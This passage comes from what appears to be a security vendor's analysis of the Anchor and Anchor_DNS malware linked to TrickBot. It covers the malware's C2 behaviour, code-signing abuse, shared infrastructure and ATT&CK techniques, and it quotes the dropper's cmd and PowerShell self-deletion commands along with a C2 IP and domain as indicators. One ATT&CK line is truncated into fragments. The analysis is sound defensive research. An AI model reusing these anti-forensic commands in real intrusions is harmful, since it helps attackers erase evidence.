Unlike Anchor_DNS, which stores the information in Base64, Anchor's GUID is saved in cleartext.

### Self Deletion

Anchor and older versions of Anchor_DNS implement the exact same self-deletion routine, using two sets of commands to ensure that the dropper is deleted once the malware has been successfully deployed:

```
cmd.exe /c timeout 1 && del C:\Users\[USER]\[SAMPLE_LOCATION]"
cmd.exe /C PowerShell 'Start-Sleep 5; Remove-Item C:\Users\[USER]\[SAMPLE_LOCATION]'
```

### C2 Communication

Similar to TrickBot, Anchor tries to establish Internet connectivity and the external IP of the target machine prior to communicating with its C2 servers. It uses the hardcoded web services listed below under External IP Check Web Services to test connectivity. Once it has established connectivity, it communicates with a set of hardcoded C2 servers.

_Communication with a set of hardcoded C2 servers._

[The request and response follow the same C2 communication format as TrickBot.](http://malware-traffic-analysis.net/2019/10/02/index.html)

_The request and response format of Anchor._

### Connecting Anchor / Anchor_DNS to TrickBot

Anchor and Anchor_DNS are both directly linked to TrickBot infections, as they are downloaded by TrickBot as secondary payloads. There are also several other similarities, noted below.

**GUID Generation Function**

The GUID generation functions for Anchor_DNS and Anchor seem almost identical to that of the GUID generated by TrickBot. The GUID follows this pattern: **[Machine_NAME]_[Windows_Version].[Client_ID]**

| Malware Name | GUID |
| --- | --- |
| Anchor_DNS | /anchor_dns/MACHINE-001_W617601.D4CB942AA18EFF519DCBCAE88A0A99FB/ |
| Anchor | /anchor001/jujubox-PC_W617601.6E8516CA48318FB2904E2027B5350B26 |
| TrickBot | /mor49/DAVID-PC_W10017134.55C60B5D13499341D72F5A34C632CFD9 |

**External IP Check Web Services**

Both Anchor and older versions of Anchor_DNS use a list of hardcoded online web services to determine Internet connectivity and check the external IP of the infected machine. The same list is also used by TrickBot: checkip.amazonaws.com, ipecho.net, ipinfo.io, api.ipify.org, icanhazip.com, myexternalip.com, wtfismyip.com, and ip.anysrc.net. In certain cases, if Internet connectivity cannot be reached, Anchor and older versions of Anchor_DNS will delete themselves.

**Shared C2 Infrastructure**

TrickBot, Anchor, and Anchor_DNS typically use separate C2 infrastructure. However, in some instances of this attack, there was C2 server overlap between these infrastructures. For example, the IP 23.95.97[.]59, which is hardcoded in an Anchor sample, has also served Anchor_DNS and TrickBot:

_Anchor sample with hardcoded IP (SHA-1: 9ebb541dcb24d564448a6f5e00c613b73eba7148)_

**Connection to TrickBot**

This IP address was used by TrickBot to download the squlDLL plugin, which includes email harvesting from SQL servers, a screenlocker, and Mimikatz.

**Connection to Anchor_DNS**

[The same IP resolved to a domain previously used by Anchor_DNS, chishir[.]com.](https://technical.nttsecurity.com/post/102fsp2/trickbot-variant-anchor-dns-communicating-over-dns)

_Passive DNS information for 23.95.97[.]59, taken from [VirusTotal](https://www.virustotal.com/gui/ip-address/23.95.97.59/relations)._

### Comparison Between the Anchor Malware Family

The following table gives a comparison between different malware in the Anchor malware family.

| Features | Anchor | Old Anchor_DNS | New Anchor_DNS |
| --- | --- | --- | --- |
| Earliest Observed Sample | August 2018 | May 2019 | November 2019 |
| Command-line arguments? | - | + | + |
| Self-Deletion | + | + | - |
| Network Connectivity check via ICMP | - | - | + |
| Network Connectivity check via web services | + | + | - |
| NTFS ADS files | + | + | + |
| TrickBot's GUID Generation pattern | + (Cleartext) | + (base64) | + (base64) |
| Code Obfuscation | Very Little | Very Little | Obfuscated Code |
| C2 Communication Protocols | HTTP(S) | DNS | ICMP, DNS |

## Rise of Signed Malware

Code signing is meant to provide a level of credibility and integrity to a binary from the developer, and to guarantee that the binary has not been tampered with. In the past, signing malware was a practice mostly seen with nation-state threat actors. However, this is no longer the case. Nowadays, more and more commodity malware is being signed with valid certificates, effectively bypassing some security solutions that grant trust to signed binaries.

Malicious files in this attack were signed by:

- Biller FIN Oy
- NIRMAL 0013 Limited
- BRO-BURGER, LLC

TrickBot payloads and Anchor / Anchor_DNS payloads were at times signed by the same signer, which further demonstrates that these malware families are most likely used by the same threat actor. In searching for additional signed known and unknown files, we were able to identify dozens of malware samples signed by the same organizations. Some were also signed with the same serial number.

1. Biller FIN Oy Signer:

[A VirusTotal Signer name search shows malware associated with these campaigns.](https://www.virustotal.com/gui/search/signature%253A%2522Biller%2520FIN%2520Oy%2522/files)

[A VirusTotal Serial Number search shows malware associated with the campaigns.](https://www.virustotal.com/gui/search/signature%253A%252206%252027%2520E6%25203C%2520FA%252011%252017%252045%252084%252028%2520D3%252092%2520DF%2520AA%25208D%2520AE%2522/files)

## Conclusion

This research gives a detailed step-by-step analysis of recent attacks targeting the financial, manufacturing, and retail sectors across the United States and Europe. These attacks start with a TrickBot infection and, with high-profile targets, can escalate to a hacking operation leveraging a new malware, Anchor, and a new variant of Anchor_DNS. [Unlike previously reported TrickBot attacks that resulted in mass ransomware infections](https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware), these new attacks focus on stealing sensitive information from POS systems and other sensitive resources in the victims' network by compromising critical assets.

In addition, Cybereason discovered a previously undocumented malware called Anchor as well as a new variant of the recently discovered Anchor_DNS malware. Both Anchor and Anchor_DNS are directly related to TrickBot infections and have code similarities, and sometimes also share C2 infrastructure with TrickBot.
Anchor_DNS uses various techniques to keep itself under the radar, such as communication over DNS and the reliance on specific command-line arguments in order to run properly. Through these techniques, it is able to evade many security products, including certain sandboxes and AV vendors.

These attacks stress the danger of commodity malware infections, which may sometimes be underestimated due to their frequent use and high volume. It is important to note that, in this attack, once an endpoint is infected with TrickBot it is up to the attackers to decide their next move. If they identify a high-value target, they can go beyond the traditional information stealing capabilities of TrickBot and use the target machine as an entry point to other machines on the network.

This research does not focus on the attribution of these attacks. However, through analysis of the evidence and context presented in our research, we noticed certain TTP overlaps with earlier attacks that were attributed to the financially-motivated FIN6 threat actor. We leave it to our readers to draw their own conclusions on the attribution of these attacks.

Lastly, these attacks show how threat actors are shifting toward signed malware more than ever before. As this trend continues to evolve, security practitioners and security vendors must improve the detection of signed malware and re-think the trust given to signed binaries in general.

[The best way to defend against an attack like this is to use an iterative security process. Read more in our white paper.](https://www.cybereason.com/unleashing-the-true-potential-mitre-attck?hsCtaTracking=d8b5fccc-df9b-4621-86be-9d72ad635e7f%7C31de2ef9-bf97-4290-a751-4c3ec822e56c)

## Indicators of Compromise

[For a comprehensive list of indicators of compromise, please see the PDF file for this attack here.](https://www.cybereason.com/hubfs/Indicators%20of%20Compromise/Anchor%20IOCs.pdf)

## MITRE ATT&CK Techniques

- **Initial Access:** Spearphishing Link
- **Execution:** [User Execution](https://attack.mitre.org/techniques/T1204), Scheduled Task, Execution through API, Command-Line Interface, [PowerShell](https://attack.mitre.org/techniques/T1086), [Rundll32](https://attack.mitre.org/techniques/T1085), [Scripting](https://attack.mitre.org/techniques/T1064), [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [Execution through Module Load](https://attack.mitre.org/techniques/T1129)
- **Persistence:** Scheduled Task, Browser Extensions
- **Privilege Escalation:** Scheduled Task, [Process Injection](https://attack.mitre.org/techniques/T1055), [Bypass User Account Control](https://attack.mitre.org/techniques/T1088), Access Token Manipulation
- **Defense Evasion:** [Modify Registry](https://attack.mitre.org/techniques/T1112), [Code Signing](https://attack.mitre.org/techniques/T1116), Process Injection, Bypass User Account Control, Access Token Manipulation, Deobfuscate/Decode Files or Information, Rundll32, [Masquerading](https://attack.mitre.org/techniques/T1036), Scripting, [NTFS File Attributes](https://attack.mitre.org/techniques/T1096)
- **Credential Access:** [Credentials from Web Browsers](https://attack.mitre.org/techniques/T1503), Brute Force, Private Keys, Credential Dumping
- **Discovery:** Query Registry, [System Information Discovery](https://attack.mitre.org/techniques/T1082), [Permission Groups Discovery](https://attack.mitre.org/techniques/T1069), Account Discovery, [Domain Trust Discovery](https://attack.mitre.org/techniques/T1482)
- **Collection:** Clipboard Data
- **Exfiltration:** Exfiltration Over Alternative Protocol
- **Exfiltration / Command and Control (remaining entries truncated on the page):** Da En Da O St Ap La Pr Re Co U Us

## About the Author

**Cybereason Nocturnus**

The Cybereason Nocturnus Team has brought the world's brightest minds from the military, government intelligence, and enterprise security to uncover emerging threats across the globe. They specialize in analyzing new attack methodologies, reverse-engineering malware, and exposing unknown system vulnerabilities. The Cybereason Nocturnus Team was the first to release a vaccination for the 2017 NotPetya and Bad Rabbit cyberattacks.

[All Posts by Cybereason Nocturnus](https://www.cybereason.com/blog/authors/cybereason-nocturnus)